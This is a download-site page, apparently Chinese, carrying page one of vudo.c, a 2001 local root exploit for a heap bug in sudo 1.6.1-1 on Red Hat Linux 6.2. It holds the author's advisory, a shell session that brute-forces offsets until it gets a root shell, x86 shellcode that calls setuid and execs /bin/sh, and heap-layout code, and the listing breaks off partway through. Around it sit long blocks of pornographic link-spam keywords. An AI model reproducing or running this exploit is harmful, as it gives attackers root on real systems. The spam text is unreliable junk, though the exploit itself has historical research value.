亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? vudo.c

?? 密碼破解源代碼
?? C
?? 第 1 頁 / 共 2 頁
字號:
-[ Vudo - An object superstitiously believed to embody magical powers ]---------------[ Michel "MaXX" Kaempf <maxx@synnergy.net> ]------------------------------[ Copyright (C) 2001 Synnergy Networks ]------------------[ 0x00 - Introduction ]-----------------------------------------------Sudo (superuser do) allows a system administrator to give certain users(or groups of users) the ability to run some (or all) commands as rootor another user while logging the commands and arguments.-- http://www.courtesan.com/sudo/index.htmlOn February 19, 2001, Sudo version 1.6.3p6 was released: "This fixesa potential security problem. So far, the bug does not appear to beexploitable." Despite the comments sent to various security mailinglists after the announce of the new Sudo version, the bug is not abuffer overflow and the bug does not damage the stack.But the bug is exploitable: even a single byte located somewhere in theheap, erroneously overwritten by a NUL byte before a call to syslog(3)and immediately restored after the syslog(3) call, may actually lead toexecution of code as root. A working exploit for Red Hat Linux/Intel 6.2(Zoot) sudo-1.6.1-1 is attached at the end of this email and a completeresearch paper on this issue and on general heap corruption techniqueswill be released soon.This research paper will focus on Linux/Intel systems and will:- detail the Sudo bug and explain why a precise knowledge of how mallocworks internally is needed in order to exploit it;- describe the functioning of the memory allocator used by the GNU CLibrary (Doug Lea's Malloc) from the attacker's point of view;- apply this information to the Sudo bug and present four theoreticaltechniques to exploit it;- demonstrate how one of these methods can be implemented in practice inorder to gain root privileges.I did not plan to publish the exploit without the paper but a discussionof the Sudo vulnerability started on the vuln-dev mailing list and Iwanted to share the Vudo exploit with the security community. Stay tunedfor the complete research paper soon...--[ 0x01 - Exploit ]----------------------------------------------------In order to successfully gain root privileges via the Vudo exploit, auser does not necessarily need to be present in the sudoers file, buthas to know their user password. They need additionally to provide threecommand line arguments:- the address of the __malloc_hook function pointer, which varies fromone system to another but can be determined;- the size of the tz buffer, which varies slightly from one system toanother and has to be brute forced;- the size of the envp buffer, which varies slightly from one system toanother and has to be brute forced.A typical Vudo cult^H^H^H^Hsession starts with an authentication step,a __malloc_hook computation step, and eventually a brute force step,based on the tz and envp examples provided by the Vudo usage message(fortunately the user does not need to provide their password each timeSudo is executed during the brute force step because they authenticatedright before):$ /usr/bin/sudo www.MasterSecuritY.frPassword:maxx is not in the sudoers file.  This incident will be reported.$ LD_TRACE_LOADED_OBJECTS=1 /usr/bin/sudo | grep /lib/libc.so.6        libc.so.6 => /lib/libc.so.6 (0x00161000)$ nm /lib/libc.so.6 | grep __malloc_hook000ef1dc W __malloc_hook$ perl -e 'printf "0x%08x\n", 0x00161000 + 0x000ef1dc'0x002501dc$ for tz in `seq 62587 8 65531`> do> for envp in `seq 6862 2 6874`> do> ./vudo 0x002501dc $tz $envp> done> donemaxx is not in the sudoers file.  This incident will be reported.maxx is not in the sudoers file.  This incident will be reported.maxx is not in the sudoers file.  This incident will be reported.maxx is not in the sudoers file.  This incident will be reported.maxx is not in the sudoers file.  This incident will be reported.maxx is not in the sudoers file.  This incident will be reported.maxx is not in the sudoers file.  This incident will be reported.maxx is not in the sudoers file.  This incident will be reported.maxx is not in the sudoers file.  This incident will be reported.maxx is not in the sudoers file.  This incident will be reported.bash#/* * vudo.c versus Red Hat Linux/Intel 6.2 (Zoot) sudo-1.6.1-1 * Copyright (C) 2001 Michel "MaXX" Kaempf <maxx@synnergy.net> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or (at * your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 * USA */#include <limits.h>#include <paths.h>#include <pwd.h>#include <stdio.h>#include <stdlib.h>#include <string.h>#include <sys/types.h>#include <unistd.h>typedef struct malloc_chunk {    size_t prev_size;    size_t size;    struct malloc_chunk * fd;    struct malloc_chunk * bk;} * mchunkptr;#define SIZE_SZ sizeof(size_t)#define MALLOC_ALIGNMENT ( SIZE_SZ + SIZE_SZ )#define MALLOC_ALIGN_MASK ( MALLOC_ALIGNMENT - 1 )#define MINSIZE sizeof(struct malloc_chunk)/* shellcode */#define sc \    /* jmp */ \    "\xeb\x0appssssffff" \    /* setuid */ \    "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" \    /* setgid */ \    "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80" \    /* execve */ \    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" \    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" \    "\x80\xe8\xdc\xff\xff\xff/bin/sh"#define MAX_UID_T_LEN 10#define MAXSYSLOGLEN 960#define IFCONF_BUF r2s( 8200 )#define SUDOERS_FP r2s( 176 )#define VASPRINTF r2s( 6300 )#define VICTIM_SIZE r2s( 1500 )#define SUDO "/usr/bin/sudo"#define USER_CWD "/"#define MESSAGE 19 /* "command not allowed" or "user NOT in sudoers" */#define USER_ARGS ( VASPRINTF - VICTIM_SIZE - SIZE_SZ - 1 - (MAXSYSLOGLEN+1) )#define PREV_SIZE 0x5858614d#define SIZE r2s( 192 )#define SPACESPACE 0x08072020#define POST_PS1 ( r2s(16) + r2s(640) + r2s(400) )#define BK ( SPACESPACE - POST_PS1 + SIZE_SZ - sizeof(sc) )#define STACK ( 0xc0000000 - 4 )#define PRE_SHELL "SHELL="#define MAXPATHLEN 4095#define SHELL ( MAXPATHLEN - 1 )#define PRE_SUDO_PS1 "SUDO_PS1="#define PRE_TZ "TZ="#define LIBC "/lib/libc.so.6"#define TZ_FIRST ( MINSIZE - SIZE_SZ - 1 )#define TZ_STEP ( MALLOC_ALIGNMENT / sizeof(char) )#define TZ_LAST ( 0x10000 - SIZE_SZ - 1 )#define POST_IFCONF_BUF ( r2s(1600)+r2s(40)+r2s(16386)+r2s(3100)+r2s(6300) )#define ENVP_FIRST ( ((POST_IFCONF_BUF - SIZE_SZ) / sizeof(char *)) - 1 )#define ENVP_STEP ( MALLOC_ALIGNMENT / sizeof(char *) )/* request2size() */size_tr2s( size_t request ){    size_t size;    size = request + ( SIZE_SZ + MALLOC_ALIGN_MASK );    if ( size < (MINSIZE + MALLOC_ALIGN_MASK) ) {        size = MINSIZE;    } else {        size &= ~MALLOC_ALIGN_MASK;    }    return( size );}/* nul() */intnul( size_t size ){    char * p = (char *)( &size );    if ( p[0] == '\0' || p[1] == '\0' || p[2] == '\0' || p[3] == '\0' ) {        return( -1 );    }    return( 0 );}/* nul_or_space() */intnul_or_space( size_t size ){    char * p = (char *)( &size );    if ( p[0] == '\0' || p[1] == '\0' || p[2] == '\0' || p[3] == '\0' ) {        return( -1 );    }    if ( p[0] == ' ' || p[1] == ' ' || p[2] == ' ' || p[3] == ' ' ) {        return( -1 );    }    return( 0 );}typedef struct vudo_s {    /* command line */    size_t __malloc_hook;    size_t tz;    size_t envp;    size_t setenv;    size_t msg;    size_t buf;    size_t NewArgv;    /* execve */    char ** execve_argv;    char ** execve_envp;} vudo_t;/* vudo_setenv() */size_tvudo_setenv( uid_t uid ){    struct passwd * pw;    size_t setenv;    char idstr[ MAX_UID_T_LEN + 1 ];    /* pw */    pw = getpwuid( uid );    if ( pw == NULL ) {        return( 0 );    }    /* SUDO_COMMAND */    setenv = r2s( 16 );    /* SUDO_USER */    setenv += r2s( strlen("SUDO_USER=") + strlen(pw->pw_name) + 1 );    setenv += r2s( 16 );    /* SUDO_UID */    sprintf( idstr, "%ld", (long)(pw->pw_uid) );    setenv += r2s( strlen("SUDO_UID=") + strlen(idstr) + 1 );    setenv += r2s( 16 );    /* SUDO_GID */    sprintf( idstr, "%ld", (long)(pw->pw_gid) );    setenv += r2s( strlen("SUDO_GID=") + strlen(idstr) + 1 );    setenv += r2s( 16 );    return( setenv );}/* vudo_msg() */size_tvudo_msg( vudo_t * p_v ){    size_t msg;    msg = ( MAXSYSLOGLEN + 1 ) - strlen( "shell " ) + 3;    msg *= sizeof(char *);    msg += SIZE_SZ - IFCONF_BUF + p_v->setenv + SUDOERS_FP + VASPRINTF;    msg /= sizeof(char *) + 1;    return( msg );}/* vudo_buf() */size_tvudo_buf( vudo_t * p_v ){    size_t buf;    buf = VASPRINTF - VICTIM_SIZE - p_v->msg;    return( buf );}/* vudo_NewArgv() */size_tvudo_NewArgv( vudo_t * p_v ){    size_t NewArgv;    NewArgv = IFCONF_BUF - VICTIM_SIZE - p_v->setenv - SUDOERS_FP - p_v->buf;    return( NewArgv );}/* vudo_execve_argv() */char **vudo_execve_argv( vudo_t * p_v ){    size_t pudding;    char ** execve_argv;    char * p;    char * user_tty;    size_t size;    char * user_runas;    int i;

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
蜜臀91精品一区二区三区| 色菇凉天天综合网| 国产精品久久久久永久免费观看 | 日本一区二区三级电影在线观看| 国产一区二区按摩在线观看| 国产精品网站导航| 色婷婷久久99综合精品jk白丝| 亚洲成人一二三| 欧美成人性战久久| 丰满少妇在线播放bd日韩电影| 国产精品久线在线观看| 欧美视频在线一区二区三区 | 国产精品国产成人国产三级| 日本久久一区二区| 日韩高清一级片| 国产喂奶挤奶一区二区三区| 91视频免费播放| 日本在线不卡视频| 中文文精品字幕一区二区| 日本道精品一区二区三区| 午夜国产精品一区| 久久精品水蜜桃av综合天堂| 日韩亚洲欧美高清| 国产在线视频一区二区三区| 国产精品久久久久久久久快鸭 | 色综合天天综合狠狠| 日产国产欧美视频一区精品| 久久午夜国产精品| 日本韩国一区二区三区| 久久成人精品无人区| 中文字幕中文在线不卡住| 欧美肥胖老妇做爰| 国产99一区视频免费| 亚洲五码中文字幕| 国产亚洲欧美日韩在线一区| 欧美性一区二区| 国产美女视频一区| 亚洲一区二区精品3399| ww久久中文字幕| 在线观看国产日韩| 国产精品18久久久久久vr| 亚洲一区在线观看免费 | 色综合色综合色综合 | 国产精一品亚洲二区在线视频| 一区二区视频在线| 亚洲精品一区二区三区蜜桃下载| 91麻豆123| 国产精品一级在线| 日本欧美在线观看| 亚洲蜜臀av乱码久久精品 | 亚洲激情图片一区| 久久综合久久综合久久| 欧美日韩综合在线| 成人一道本在线| 麻豆精品视频在线| 一区二区三区四区精品在线视频 | 午夜精品久久久久久久久久| 欧美国产一区在线| 欧美mv和日韩mv的网站| 在线观看中文字幕不卡| 成人免费视频一区| 久久精品国产网站| 亚洲一区二区高清| 国产精品全国免费观看高清 | 久久99国产精品免费| 亚洲va韩国va欧美va| 中文字幕中文乱码欧美一区二区| 欧美mv和日韩mv国产网站| 欧美日韩精品欧美日韩精品一综合| 成人高清视频免费观看| 久久国产欧美日韩精品| 亚洲成人免费在线| 亚洲欧美激情一区二区| 国产亚洲欧美色| 欧美tickle裸体挠脚心vk| 7799精品视频| 欧美亚洲一区二区在线观看| 99这里只有久久精品视频| 国产乱一区二区| 欧美亚日韩国产aⅴ精品中极品| 国产激情精品久久久第一区二区| 婷婷久久综合九色综合伊人色| 亚洲天堂久久久久久久| 国产女同互慰高潮91漫画| 精品欧美黑人一区二区三区| 在线综合+亚洲+欧美中文字幕| 欧美亚一区二区| 色播五月激情综合网| www.成人在线| 国产91精品在线观看| 国产成人在线电影| 国产裸体歌舞团一区二区| 久久99久久99| 国内精品写真在线观看| 毛片av中文字幕一区二区| 日本美女一区二区三区| 日韩精品视频网站| 天堂va蜜桃一区二区三区| 亚洲综合激情网| 一区二区激情小说| 亚洲美女免费在线| 一区二区不卡在线播放 | 伊人性伊人情综合网| 亚洲精品免费播放| 亚洲日本va在线观看| 国产精品传媒视频| 亚洲欧洲av色图| 亚洲日本va午夜在线影院| 亚洲天堂免费看| 一区二区成人在线观看| 亚洲第一综合色| 午夜精品福利在线| 蜜桃av噜噜一区二区三区小说| 麻豆精品视频在线观看免费| 狠狠久久亚洲欧美| 国产成人自拍在线| 风间由美中文字幕在线看视频国产欧美| 国产一区在线看| 丁香网亚洲国际| 91亚洲国产成人精品一区二三| 99re热这里只有精品免费视频 | 欧美高清视频不卡网| 欧美一区二区三区思思人| 日韩三级高清在线| 国产调教视频一区| 综合亚洲深深色噜噜狠狠网站| 亚洲另类一区二区| 偷拍与自拍一区| 老司机免费视频一区二区三区| 激情久久久久久久久久久久久久久久| 国产一区二区三区四区五区美女 | 91香蕉视频污| 欧美日韩一级黄| 精品入口麻豆88视频| 国产精品私人影院| 亚洲一区二区视频在线观看| 日韩精品91亚洲二区在线观看| 九一九一国产精品| www.亚洲在线| 欧美日韩久久一区| 精品成人一区二区三区| 国产精品盗摄一区二区三区| 亚洲va欧美va人人爽| 国产麻豆日韩欧美久久| 91福利在线免费观看| 欧美不卡123| 亚洲天堂av一区| 日韩国产精品91| 国产不卡一区视频| 欧美亚洲国产一区在线观看网站| 日韩午夜精品电影| 成人欧美一区二区三区| 婷婷丁香久久五月婷婷| 国产电影一区二区三区| 色妹子一区二区| 欧美变态tickle挠乳网站| 亚洲视频小说图片| 美日韩一区二区| 丁香六月久久综合狠狠色| 欧美丝袜自拍制服另类| 久久久无码精品亚洲日韩按摩| 亚洲美女区一区| 国产在线精品一区二区不卡了| 91麻豆精品在线观看| 日韩一区二区免费在线电影| 亚洲欧洲日产国产综合网| 免费高清视频精品| 91美女在线视频| 欧美成人精精品一区二区频| 亚洲三级在线观看| 国产一区二区三区黄视频| 在线观看视频91| 国产清纯白嫩初高生在线观看91| 亚洲电影在线播放| 国产成人精品免费视频网站| 4438x成人网最大色成网站| 国产精品丝袜黑色高跟| 日本最新不卡在线| 91美女蜜桃在线| 国产亚洲欧美色| 蜜桃视频第一区免费观看| 99久久精品一区二区| 精品国产1区2区3区| 亚洲国产精品麻豆| 北岛玲一区二区三区四区| 欧美精品一区二区蜜臀亚洲| 亚洲国产一区二区三区| 成人一区在线观看| 日韩美女视频在线| 亚洲一区二三区| 99精品久久只有精品| 久久久久久久久蜜桃| 青青青伊人色综合久久| 在线观看不卡视频| 国产精品免费久久久久| 精品午夜一区二区三区在线观看| 欧美日韩一区中文字幕| 亚洲欧美aⅴ...| 成人高清视频在线观看| 久久久噜噜噜久久人人看|